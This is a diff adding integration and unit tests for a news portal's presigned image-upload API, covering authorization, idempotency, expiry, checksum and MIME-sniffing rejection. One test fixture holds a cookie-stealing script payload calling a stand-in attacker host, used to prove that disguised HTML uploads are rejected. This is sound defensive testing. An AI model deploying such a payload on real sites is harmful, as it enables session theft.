+      store.set(created.body.data.objectKey, REAL_JPEG_BYTES);
+
+      const deps = {
+        sql: getDatabaseClient(),
+        config: resolveNewsMediaR2Config(),
+        createR2Client: (config: ReturnType<typeof resolveNewsMediaR2Config>) =>
+          createNewsMediaR2Client({
+            accountId: config.accountId,
+            accessKeyId: config.accessKeyId,
+            secretAccessKey: config.secretAccessKey,
+            bucket: config.bucket,
+            endpoint: `http://127.0.0.1:${flakyServer.port}`
+          })
+      };
+
+      const first = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "flaky-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        deps
+      );
+      expect(first.status).toBe(502);
+      const firstBody = (await first.json()) as { error: { code: string } };
+      expect(firstBody.error.code).toBe("PROVIDER_ERROR");
+
+      // Claim must have been reverted -> row is back to `pending_upload`,
+      // retryable with a fresh Idempotency-Key (not stuck at `uploaded`
+      // forever — PR #653 re-review).
+      const rowAfterFailure = (await getAdminSql()`
+        SELECT status FROM awcms_mini_news_media_objects WHERE id = ${created.body.data.objectId}
+      `) as { status: string }[];
+      expect(rowAfterFailure[0]!.status).toBe("pending_upload");
+
+      const second = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "flaky-key-2",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        deps
+      );
+      expect(second.status).toBe(200);
+      const secondBody = (await second.json()) as { data: { status: string } };
+      expect(secondBody.data.status).toBe("verified");
+    } finally {
+      flakyServer.stop(true);
+    }
+  });
 });

--- a/tests/integration/news-media-upload-session-api.integration.test.ts
+++ b/tests/integration/news-media-upload-session-api.integration.test.ts
@@ -1,0 +1,782 @@
+/**
+ * Integration tests for the direct-to-R2 presigned upload flow API (Issue
+ * #634, epic `news_portal`): `POST .../upload-sessions` (create),
+ * `.../{id}/finalize`, `.../{id}/cancel`, against a real PostgreSQL.
+ *
+ * THIS SUITE PROVES THE FIX for the security-auditor Critical finding on
+ * Issue #631: `finalize` must never promote a row past a bare `HEAD` check.
+ * The "HTML/JS disguised as a .jpg" tests below are the exact exploit
+ * scenario that finding described — they upload real HTML/JS bytes to a
+ * fake R2 object whose key/claimed-mime-type says "image/jpeg", and assert
+ * `finalize` REJECTS it (422 `UPLOAD_VERIFICATION_FAILED`), the row never
+ * reaches `verified`, and no editorial content could ever reference it.
+ *
+ * Route-level (`invoke()` against the real Astro handlers) for everything
+ * that does not require a real R2 round trip: auth/tenant/ABAC guards,
+ * request validation, idempotency, not-found/wrong-status/expired-session
+ * (all decided from DB state alone, before any R2 call happens).
+ *
+ * For scenarios that DO require a real R2 round trip (object accepted,
+ * object missing, MIME-sniff/checksum rejection), this suite calls
+ * `finalizeNewsMediaUploadSession` (the exact function the finalize route
+ * thinly wraps — see that module's header) directly, injecting a
+ * `Bun.S3Client` pointed at a local fake in-memory S3-compatible HTTP
+ * server via `deps.createR2Client` — the route itself has no such seam
+ * (Astro route handlers have a fixed signature), so this is the same
+ * "inject a real client against a fake server" convention
+ * `tests/integration/object-dispatch.integration.test.ts` already
+ * established for `sync-storage`, applied at the one layer down where an
+ * injection point actually exists.
+ *
+ * Skipped unless DATABASE_URL is set (see tests/integration/harness.ts).
+ */
+import {
+  afterAll,
+  beforeAll,
+  beforeEach,
+  describe,
+  expect,
+  test
+} from "bun:test";
+
+import {
+  applyMigrations,
+  createCookieJar,
+  getAdminSql,
+  integrationEnabled,
+  invoke,
+  provisionAppRole,
+  resetDatabase
+} from "./harness";
+
+import { POST as setupInitialize } from "../../src/pages/api/v1/setup/initialize";
+import { POST as authLogin } from "../../src/pages/api/v1/auth/login";
+import { POST as createUploadSession } from "../../src/pages/api/v1/media/news-images/upload-sessions/index";
+import { POST as cancelUploadSession } from "../../src/pages/api/v1/media/news-images/upload-sessions/[id]/cancel";
+import { POST as finalizeUploadSessionRoute } from "../../src/pages/api/v1/media/news-images/upload-sessions/[id]/finalize";
+import { finalizeNewsMediaUploadSession } from "../../src/modules/news-portal/application/news-media-finalize-upload-session";
+import { resolveNewsMediaR2Config } from "../../src/modules/news-portal/domain/news-media-r2-config";
+import { getDatabaseClient } from "../../src/lib/database/client";
+import { createNewsMediaR2Client } from "../../src/modules/news-portal/infrastructure/news-media-r2-client";
+import { hashSessionToken } from "../../src/lib/auth/session-token";
+
+const OWNER_LOGIN = "owner@example.com";
+const OWNER_PASSWORD = "integration-test-owner-password";
+const R2_BUCKET = "news-media-test-bucket";
+
+type Bootstrap = { tenantId: string; token: string };
+
+async function bootstrap(
+  tenantCode = "newsco",
+  tenantName = "News Co"
+): Promise<Bootstrap> {
+  const setup = await invoke<{ data: { tenantId: string } }>(setupInitialize, {
+    method: "POST",
+    path: "/api/v1/setup/initialize",
+    headers: { "content-type": "application/json" },
+    body: {
+      tenantName,
+      tenantCode,
+      officeCode: "hq",
+      officeName: "HQ",
+      ownerLoginIdentifier: `${tenantCode}-${OWNER_LOGIN}`,
+      ownerPassword: OWNER_PASSWORD,
+      ownerDisplayName: "Owner"
+    }
+  });
+  expect(setup.status).toBe(200);
+
+  const login = await invoke<{ data: { token: string } }>(authLogin, {
+    method: "POST",
+    path: "/api/v1/auth/login",
+    headers: {
+      "content-type": "application/json",
+      "x-awcms-mini-tenant-id": setup.body.data.tenantId
+    },
+    body: {
+      loginIdentifier: `${tenantCode}-${OWNER_LOGIN}`,
+      password: OWNER_PASSWORD
+    },
+    cookies: createCookieJar()
+  });
+  expect(login.status).toBe(200);
+
+  return { tenantId: setup.body.data.tenantId, token: login.body.data.token };
+}
+
+/** Provisions a second tenant user with only `news_portal.media.read` (no `create`) — used for the ABAC default-deny test. */
+async function provisionReadOnlyUser(
+  tenantId: string,
+  loginIdentifier: string
+): Promise<Bootstrap> {
+  const password = "integration-test-scoped-password";
+  const admin = getAdminSql();
+  const passwordHash = await Bun.password.hash(password);
+
+  await admin.begin(async (tx) => {
+    await tx.unsafe(`SET LOCAL app.current_tenant_id = '${tenantId}'`);
+
+    const profile = (await tx`
+      INSERT INTO awcms_mini_profiles (tenant_id, profile_type, display_name)
+      VALUES (${tenantId}, 'person', ${loginIdentifier}) RETURNING id
+    `) as { id: string }[];
+    const identity = (await tx`
+      INSERT INTO awcms_mini_identities (tenant_id, profile_id, login_identifier, password_hash)
+      VALUES (${tenantId}, ${profile[0]!.id}, ${loginIdentifier}, ${passwordHash})
+      RETURNING id
+    `) as { id: string }[];
+    const tenantUser = (await tx`
+      INSERT INTO awcms_mini_tenant_users (tenant_id, identity_id)
+      VALUES (${tenantId}, ${identity[0]!.id}) RETURNING id
+    `) as { id: string }[];
+    const role = (await tx`
+      INSERT INTO awcms_mini_roles (tenant_id, role_code, role_name)
+      VALUES (${tenantId}, ${`role_${loginIdentifier}`}, ${loginIdentifier}) RETURNING id
+    `) as { id: string }[];
+
+    const permission = (await tx`
+      SELECT id FROM awcms_mini_permissions
+      WHERE module_key = 'news_portal' AND activity_code = 'media' AND action = 'read'
+    `) as { id: string }[];
+
+    await tx`
+      INSERT INTO awcms_mini_role_permissions (tenant_id, role_id, permission_id)
+      VALUES (${tenantId}, ${role[0]!.id}, ${permission[0]!.id})
+    `;
+
+    await tx`
+      INSERT INTO awcms_mini_access_assignments (tenant_id, tenant_user_id, role_id)
+      VALUES (${tenantId}, ${tenantUser[0]!.id}, ${role[0]!.id})
+    `;
+  });
+
+  const login = await invoke<{ data: { token: string } }>(authLogin, {
+    method: "POST",
+    path: "/api/v1/auth/login",
+    headers: {
+      "content-type": "application/json",
+      "x-awcms-mini-tenant-id": tenantId
+    },
+    body: { loginIdentifier, password },
+    cookies: createCookieJar()
+  });
+  expect(login.status).toBe(200);
+
+  return { tenantId, token: login.body.data.token };
+}
+
+function authHeaders(b: Bootstrap): Record<string, string> {
+  return {
+    "content-type": "application/json",
+    "x-awcms-mini-tenant-id": b.tenantId,
+    authorization: `Bearer ${b.token}`
+  };
+}
+
+/** Minimal in-memory fake S3-compatible HTTP server — path-style `/{bucket}/{objectKey}` (confirmed empirically to be what `Bun.S3Client` requests). */
+function startFakeR2Server(): {
+  server: ReturnType<typeof Bun.serve>;
+  put: (objectKey: string, bytes: Uint8Array) => void;
+} {
+  const store = new Map<string, Uint8Array>();
+  const prefix = `/${R2_BUCKET}/`;
+
+  const server = Bun.serve({
+    port: 0,
+    fetch(request) {
+      const url = new URL(request.url);
+      if (!url.pathname.startsWith(prefix)) {
+        return new Response("not found", { status: 404 });
+      }
+      const key = url.pathname.slice(prefix.length);
+      const bytes = store.get(key);
+
+      if (request.method === "HEAD") {
+        if (!bytes) return new Response(null, { status: 404 });
+        return new Response(null, {
+          status: 200,
+          headers: { "content-length": String(bytes.byteLength) }
+        });
+      }
+
+      if (request.method === "GET") {
+        if (!bytes) return new Response(null, { status: 404 });
+        const arrayBuffer = bytes.buffer.slice(
+          bytes.byteOffset,
+          bytes.byteOffset + bytes.byteLength
+        ) as ArrayBuffer;
+        return new Response(arrayBuffer, { status: 200 });
+      }
+
+      return new Response("method not supported by fake server", {
+        status: 405
+      });
+    }
+  });
+
+  return {
+    server,
+    put: (objectKey, bytes) => store.set(objectKey, bytes)
+  };
+}
+
+const HTML_EXPLOIT_PAYLOAD = new TextEncoder().encode(
+  "<html><body><script>fetch('https://evil.example/steal?c='+document.cookie)</script></body></html>"
+);
+const REAL_JPEG_BYTES = new Uint8Array([
+  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01
+]);
+
+const suite = integrationEnabled ? describe : describe.skip;
+
+suite("news media presigned upload session API (Issue #634)", () => {
+  const previousEnv = { ...process.env };
+
+  beforeAll(async () => {
+    await applyMigrations();
+    await provisionAppRole();
+
+    process.env.NEWS_MEDIA_R2_ENABLED = "true";
+    process.env.NEWS_MEDIA_R2_ACCOUNT_ID = "test-account";
+    process.env.NEWS_MEDIA_R2_ACCESS_KEY_ID = "test-news-media-key";
+    process.env.NEWS_MEDIA_R2_SECRET_ACCESS_KEY = "test-news-media-secret";
+    process.env.NEWS_MEDIA_R2_BUCKET = R2_BUCKET;
+    process.env.NEWS_MEDIA_R2_PUBLIC_BASE_URL = "https://media.example.test";
+    process.env.NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS = "300";
+    process.env.NEWS_MEDIA_R2_MAX_UPLOAD_BYTES = "10485760";
+    process.env.NEWS_MEDIA_R2_ALLOWED_MIME_TYPES =
+      "image/jpeg,image/png,image/webp,image/gif";
+  });
+
+  afterAll(() => {
+    process.env = previousEnv;
+  });
+
+  beforeEach(async () => {
+    await resetDatabase();
+  });
+
+  test("create: authenticated owner gets a scoped presigned URL, server-generated object key, never a raw credential", async () => {
+    const owner = await bootstrap();
+
+    const response = await invoke<{
+      data: {
+        objectId: string;
+        objectKey: string;
+        presignedUrl: string;
+        expiresAt: string;
+      };
+    }>(createUploadSession, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions",
+      headers: authHeaders(owner),
+      body: { mimeType: "image/jpeg", byteSize: 1024 }
+    });
+
+    expect(response.status).toBe(200);
+    expect(response.body.data.objectKey).toMatch(
+      new RegExp(`^news-media/${owner.tenantId}/\\d{4}/\\d{2}/`)
+    );
+    expect(response.body.data.presignedUrl).toContain(
+      response.body.data.objectKey
+    );
+    expect(response.body.data.presignedUrl).not.toContain(
+      "test-news-media-secret"
+    );
+    expect(new Date(response.body.data.expiresAt).getTime()).toBeGreaterThan(
+      Date.now()
+    );
+  });
+
+  test("create: rejects a disallowed mime type (image/svg+xml)", async () => {
+    const owner = await bootstrap();
+
+    const response = await invoke(createUploadSession, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions",
+      headers: authHeaders(owner),
+      body: { mimeType: "image/svg+xml", byteSize: 1024 }
+    });
+
+    expect(response.status).toBe(400);
+    expect((response.body as { error: { code: string } }).error.code).toBe(
+      "VALIDATION_ERROR"
+    );
+  });
+
+  test("create: rejects byteSize larger than NEWS_MEDIA_R2_MAX_UPLOAD_BYTES", async () => {
+    const owner = await bootstrap();
+
+    const response = await invoke(createUploadSession, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions",
+      headers: authHeaders(owner),
+      body: { mimeType: "image/jpeg", byteSize: 999_999_999 }
+    });
+
+    expect(response.status).toBe(400);
+  });
+
+  test("create: ABAC default-deny for a user without news_portal.media.create", async () => {
+    const owner = await bootstrap();
+    const readOnly = await provisionReadOnlyUser(
+      owner.tenantId,
+      "reader@example.com"
+    );
+
+    const response = await invoke(createUploadSession, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions",
+      headers: authHeaders(readOnly),
+      body: { mimeType: "image/jpeg", byteSize: 1024 }
+    });
+
+    expect(response.status).toBe(403);
+    expect((response.body as { error: { code: string } }).error.code).toBe(
+      "ACCESS_DENIED"
+    );
+  });
+
+  test("create: requires tenant header and auth", async () => {
+    const noTenant = await invoke(createUploadSession, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions",
+      headers: { "content-type": "application/json" },
+      body: { mimeType: "image/jpeg", byteSize: 1024 }
+    });
+    expect(noTenant.status).toBe(400);
+
+    const owner = await bootstrap("noauthorization");
+    const noAuth = await invoke(createUploadSession, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions",
+      headers: {
+        "content-type": "application/json",
+        "x-awcms-mini-tenant-id": owner.tenantId
+      },
+      body: { mimeType: "image/jpeg", byteSize: 1024 }
+    });
+    expect(noAuth.status).toBe(401);
+  });
+
+  test("finalize: requires Idempotency-Key", async () => {
+    const owner = await bootstrap();
+
+    const response = await invoke(finalizeUploadSessionRoute, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions/00000000-0000-0000-0000-000000000000/finalize",
+      headers: authHeaders(owner),
+      params: { id: "00000000-0000-0000-0000-000000000000" },
+      body: {}
+    });
+
+    expect(response.status).toBe(400);
+    expect((response.body as { error: { code: string } }).error.code).toBe(
+      "IDEMPOTENCY_REQUIRED"
+    );
+  });
+
+  test("finalize: 404 for an unknown upload session id", async () => {
+    const owner = await bootstrap();
+
+    const response = await invoke(finalizeUploadSessionRoute, {
+      method: "POST",
+      path: "/api/v1/media/news-images/upload-sessions/00000000-0000-0000-0000-000000000000/finalize",
+      headers: { ...authHeaders(owner), "idempotency-key": "key-1" },
+      params: { id: "00000000-0000-0000-0000-000000000000" },
+      body: {}
+    });
+
+    expect(response.status).toBe(404);
+  });
+
+  test("finalize: rejects an expired upload session (created_at + TTL in the past) and marks it failed", async () => {
+    process.env.NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS = "1";
+    const owner = await bootstrap();
+
+    const created = await invoke<{ data: { objectId: string } }>(
+      createUploadSession,
+      {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: 1024 }
+      }
+    );
+    expect(created.status).toBe(200);
+
+    // Force created_at into the past so "now" is already past the 1s TTL
+    // without a real sleep.
+    await getAdminSql().begin(async (tx) => {
+      await tx.unsafe(`SET LOCAL app.current_tenant_id = '${owner.tenantId}'`);
+      await tx`
+        UPDATE awcms_mini_news_media_objects
+        SET created_at = now() - interval '1 hour'
+        WHERE tenant_id = ${owner.tenantId} AND id = ${created.body.data.objectId}
+      `;
+    });
+
+    const response = await invoke(finalizeUploadSessionRoute, {
+      method: "POST",
+      path: `/api/v1/media/news-images/upload-sessions/${created.body.data.objectId}/finalize`,
+      headers: { ...authHeaders(owner), "idempotency-key": "expire-key-1" },
+      params: { id: created.body.data.objectId },
+      body: {}
+    });
+
+    expect(response.status).toBe(409);
+    expect((response.body as { error: { code: string } }).error.code).toBe(
+      "UPLOAD_SESSION_EXPIRED"
+    );
+
+    const row = (await getAdminSql()`
+      SELECT status FROM awcms_mini_news_media_objects WHERE id = ${created.body.data.objectId}
+    `) as { status: string }[];
+    expect(row[0]!.status).toBe("failed");
+
+    process.env.NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS = "300";
+  });
+
+  test("finalize: 409 when the session is not pending_upload (e.g. already cancelled)", async () => {
+    const owner = await bootstrap();
+
+    const created = await invoke<{ data: { objectId: string } }>(
+      createUploadSession,
+      {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: 1024 }
+      }
+    );
+
+    const cancel = await invoke(cancelUploadSession, {
+      method: "POST",
+      path: `/api/v1/media/news-images/upload-sessions/${created.body.data.objectId}/cancel`,
+      headers: authHeaders(owner),
+      params: { id: created.body.data.objectId }
+    });
+    expect(cancel.status).toBe(200);
+
+    const finalize = await invoke(finalizeUploadSessionRoute, {
+      method: "POST",
+      path: `/api/v1/media/news-images/upload-sessions/${created.body.data.objectId}/finalize`,
+      headers: { ...authHeaders(owner), "idempotency-key": "after-cancel" },
+      params: { id: created.body.data.objectId },
+      body: {}
+    });
+    expect(finalize.status).toBe(409);
+    expect((finalize.body as { error: { code: string } }).error.code).toBe(
+      "INVALID_STATUS_TRANSITION"
+    );
+  });
+
+  test("cancel: cannot cancel twice, and cannot cancel someone else's session across tenants", async () => {
+    const owner = await bootstrap("cancelco");
+
+    const created = await invoke<{ data: { objectId: string } }>(
+      createUploadSession,
+      {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: 1024 }
+      }
+    );
+
+    const first = await invoke(cancelUploadSession, {
+      method: "POST",
+      path: `/api/v1/media/news-images/upload-sessions/${created.body.data.objectId}/cancel`,
+      headers: authHeaders(owner),
+      params: { id: created.body.data.objectId }
+    });
+    expect(first.status).toBe(200);
+
+    const second = await invoke(cancelUploadSession, {
+      method: "POST",
+      path: `/api/v1/media/news-images/upload-sessions/${created.body.data.objectId}/cancel`,
+      headers: authHeaders(owner),
+      params: { id: created.body.data.objectId }
+    });
+    expect(second.status).toBe(409);
+  });
+
+  // -------------------------------------------------------------------
+  // Real-R2-round-trip scenarios: `finalizeNewsMediaUploadSession` called
+  // directly with a `Bun.S3Client` pointed at a local fake in-memory S3
+  // server (the finalize ROUTE itself has no injection seam for this —
+  // see file header).
+  // -------------------------------------------------------------------
+
+  test("finalize: HTML/JS payload disguised as a .jpg (Issue #631 exploit scenario) is REJECTED — 422 UPLOAD_VERIFICATION_FAILED, row stays failed, never verified", async () => {
+    const owner = await bootstrap("exploitco");
+    const fake = startFakeR2Server();
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: {
+          mimeType: "image/jpeg",
+          byteSize: HTML_EXPLOIT_PAYLOAD.byteLength
+        }
+      });
+      expect(created.status).toBe(200);
+
+      // Simulate the browser's direct PUT to R2 — except the "attacker"
+      // uploads an HTML/JS payload instead of the JPEG they claimed.
+      fake.put(created.body.data.objectKey, HTML_EXPLOIT_PAYLOAD);
+
+      const response = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "exploit-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        {
+          sql: getDatabaseClient(),
+          config: resolveNewsMediaR2Config(),
+          createR2Client: (config) =>
+            createNewsMediaR2Client({
+              accountId: config.accountId,
+              accessKeyId: config.accessKeyId,
+              secretAccessKey: config.secretAccessKey,
+              bucket: config.bucket,
+              endpoint: `http://127.0.0.1:${fake.server.port}`
+            })
+        }
+      );
+
+      expect(response.status).toBe(422);
+      const body = (await response.json()) as {
+        error: { code: string; details?: { reason?: string } };
+      };
+      expect(body.error.code).toBe("UPLOAD_VERIFICATION_FAILED");
+      expect(body.error.details?.reason).toBe("mime_not_recognized");
+
+      const row = (await getAdminSql()`
+        SELECT status FROM awcms_mini_news_media_objects WHERE id = ${created.body.data.objectId}
+      `) as { status: string }[];
+      expect(row[0]!.status).toBe("failed");
+    } finally {
+      fake.server.stop(true);
+    }
+  });
+
+  test("finalize: real JPEG bytes are accepted — status verified, size/checksum recorded from the actual GET", async () => {
+    const owner = await bootstrap("acceptco");
+    const fake = startFakeR2Server();
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: REAL_JPEG_BYTES.byteLength }
+      });
+      expect(created.status).toBe(200);
+
+      fake.put(created.body.data.objectKey, REAL_JPEG_BYTES);
+
+      const response = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "accept-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        {
+          sql: getDatabaseClient(),
+          config: resolveNewsMediaR2Config(),
+          createR2Client: (config) =>
+            createNewsMediaR2Client({
+              accountId: config.accountId,
+              accessKeyId: config.accessKeyId,
+              secretAccessKey: config.secretAccessKey,
+              bucket: config.bucket,
+              endpoint: `http://127.0.0.1:${fake.server.port}`
+            })
+        }
+      );
+
+      expect(response.status).toBe(200);
+      const body = (await response.json()) as {
+        data: { status: string; sizeBytes: number; checksumSha256: string };
+      };
+      expect(body.data.status).toBe("verified");
+      expect(body.data.sizeBytes).toBe(REAL_JPEG_BYTES.byteLength);
+
+      const hasher = new Bun.CryptoHasher("sha256");
+      hasher.update(REAL_JPEG_BYTES);
+      expect(body.data.checksumSha256).toBe(hasher.digest("hex"));
+    } finally {
+      fake.server.stop(true);
+    }
+  });
+
+  test("finalize: object never actually uploaded to R2 -> rejected object_not_found, never verified", async () => {
+    const owner = await bootstrap("missingco");
+    const fake = startFakeR2Server();
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: REAL_JPEG_BYTES.byteLength }
+      });
+      // Deliberately never call fake.put() — the client never actually PUT.
+
+      const response = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "missing-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        {
+          sql: getDatabaseClient(),
+          config: resolveNewsMediaR2Config(),
+          createR2Client: (config) =>
+            createNewsMediaR2Client({
+              accountId: config.accountId,
+              accessKeyId: config.accessKeyId,
+              secretAccessKey: config.secretAccessKey,
+              bucket: config.bucket,
+              endpoint: `http://127.0.0.1:${fake.server.port}`
+            })
+        }
+      );
+
+      expect(response.status).toBe(422);
+      const body = (await response.json()) as {
+        error: { details?: { reason?: string } };
+      };
+      expect(body.error.details?.reason).toBe("object_not_found");
+    } finally {
+      fake.server.stop(true);
+    }
+  });
+
+  test("finalize: claimed checksum mismatch (transport corruption) rejects even though bytes sniff as a valid image", async () => {
+    const owner = await bootstrap("checksumco");
+    const fake = startFakeR2Server();
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: REAL_JPEG_BYTES.byteLength }
+      });
+
+      fake.put(created.body.data.objectKey, REAL_JPEG_BYTES);
+
+      const response = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "checksum-key-1",
+          claimedChecksumSha256: "0".repeat(64),
+          now: new Date()
+        },
+        {
+          sql: getDatabaseClient(),
+          config: resolveNewsMediaR2Config(),
+          createR2Client: (config) =>
+            createNewsMediaR2Client({
+              accountId: config.accountId,
+              accessKeyId: config.accessKeyId,
+              secretAccessKey: config.secretAccessKey,
+              bucket: config.bucket,
+              endpoint: `http://127.0.0.1:${fake.server.port}`
+            })
+        }
+      );
+
+      expect(response.status).toBe(422);
+      const body = (await response.json()) as {
+        error: { details?: { reason?: string } };
+      };
+      expect(body.error.details?.reason).toBe("checksum_mismatch");
+    } finally {
+      fake.server.stop(true);
+    }
+  });
+
+  test("finalize: same Idempotency-Key + same request replays the stored response instead of re-verifying", async () => {
+    const owner = await bootstrap("idempotentco");
+    const fake = startFakeR2Server();
+
+    try {
+      const created = await invoke<{
+        data: { objectId: string; objectKey: string };
+      }>(createUploadSession, {
+        method: "POST",
+        path: "/api/v1/media/news-images/upload-sessions",
+        headers: authHeaders(owner),
+        body: { mimeType: "image/jpeg", byteSize: REAL_JPEG_BYTES.byteLength }
+      });
+      fake.put(created.body.data.objectKey, REAL_JPEG_BYTES);
+
+      const deps = {
+        sql: getDatabaseClient(),
+        config: resolveNewsMediaR2Config(),
+        createR2Client: (config: ReturnType<typeof resolveNewsMediaR2Config>) =>
+          createNewsMediaR2Client({
+            accountId: config.accountId,
+            accessKeyId: config.accessKeyId,
+            secretAccessKey: config.secretAccessKey,
+            bucket: config.bucket,
+            endpoint: `http://127.0.0.1:${fake.server.port}`
+          })
+      };
+
+      const first = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "replay-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        deps
+      );
+      expect(first.status).toBe(200);
+
+      const second = await finalizeNewsMediaUploadSession(
+        {
+          tenantId: owner.tenantId,
+          objectId: created.body.data.objectId,
+          tokenHash: hashSessionToken(owner.token),
+          idempotencyKey: "replay-key-1",
+          claimedChecksumSha256: null,
+          now: new Date()
+        },
+        deps
+      );
+      expect(second.status).toBe(200);
+      expect(await second.json()).toEqual(await first.clone().json());
+    } finally {
+      fake.server.stop(true);
+    }
+  });
+});

--- a/tests/modules/news-portal-module.test.ts
+++ b/tests/modules/news-portal-module.test.ts
@@ -2,8 +2,9 @@ import { describe, expect, test } from "bun:test";
 
 import { getModuleByKey, listModules } from "../../src/modules";
 import { newsPortalModule } from "../../src/modules/news-portal/module";
+import { NEWS_MEDIA_PERMISSIONS } from "../../src/modules/news-portal/domain/news-media-permissions";
 
-describe("news_portal module descriptor (Issue #632)", () => {
+describe("news_portal module descriptor (Issue #632, extended #634)", () => {
   test("listModules() includes news_portal", () => {
     expect(listModules().some((m) => m.key === "news_portal")).toBe(true);
     expect(getModuleByKey("news_portal")).toBe(newsPortalModule);
@@ -25,18 +26,42 @@ describe("news_portal module descriptor (Issue #632)", () => {
     ]);
   });
 
-  test("the module never declares permissions, navigation, api, settings, jobs, or health before those capabilities are real (Issue #632 is preset-only)", () => {
-    // Consistent with visitor_analytics's own precedent (Issue #617): a
-    // descriptor should only claim a capability once it genuinely exists.
-    // #632 adds only a tenant module preset + its readiness gate — no
-    // media registry (#633), no upload endpoint (#634), no admin UI, no
-    // permission catalog of its own yet.
-    expect(newsPortalModule.permissions).toBeUndefined();
+  test("Issue #634 declares permissions + api now that a real HTTP surface exists, but still leaves navigation/settings/jobs/health undeclared", () => {
+    // navigation/settings/jobs/health still have no real feature backing
+    // them (no admin UI page, no per-tenant setting, no background job, no
+    // health check) — same "only claim a capability once it genuinely
+    // exists" convention visitor_analytics established (Issue #617).
     expect(newsPortalModule.navigation).toBeUndefined();
-    expect(newsPortalModule.api).toBeUndefined();
     expect(newsPortalModule.settings).toBeUndefined();
     expect(newsPortalModule.jobs).toBeUndefined();
     expect(newsPortalModule.health).toBeUndefined();
+
+    expect(newsPortalModule.api).toEqual({
+      openApiPath: "openapi/awcms-mini-public-api.openapi.yaml",
+      basePath: "/api/v1/media/news-images"
+    });
+
+    expect(newsPortalModule.permissions).toBeDefined();
+  });
+
+  test("every declared permission's activityCode/action reproduces exactly one NEWS_MEDIA_PERMISSIONS constant from #633/#634 — no invented/duplicated/orphaned permission key", () => {
+    const permissions = newsPortalModule.permissions ?? [];
+    const expectedKeys = new Set(Object.values(NEWS_MEDIA_PERMISSIONS));
+
+    expect(permissions.length).toBe(expectedKeys.size);
+
+    const declaredKeys = permissions.map(
+      (p) => `news_portal.${p.activityCode}.${p.action}`
+    );
+
+    expect(new Set(declaredKeys)).toEqual(expectedKeys);
+    // No duplicates.
+    expect(declaredKeys.length).toBe(new Set(declaredKeys).size);
+
+    for (const permission of permissions) {
+      expect(permission.activityCode).toBe("media");
+      expect(permission.description.length).toBeGreaterThan(0);
+    }
   });
 
   test("descriptor never declares a secret, token, or provider credential", () => {

--- a/tests/unit/news-media-finalize-decision.test.ts
+++ b/tests/unit/news-media-finalize-decision.test.ts
@@ -1,0 +1,87 @@
+import { describe, expect, test } from "bun:test";
+
+import { decideNewsMediaFinalizeOutcome } from "../../src/modules/news-portal/domain/news-media-finalize-decision";
+
+const ALLOWED = ["image/jpeg", "image/png", "image/webp", "image/gif"];
+
+describe("decideNewsMediaFinalizeOutcome (Issue #634)", () => {
+  test("accepts when sniffed mime matches allow-list and claimed mime, no checksum claim", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/jpeg",
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
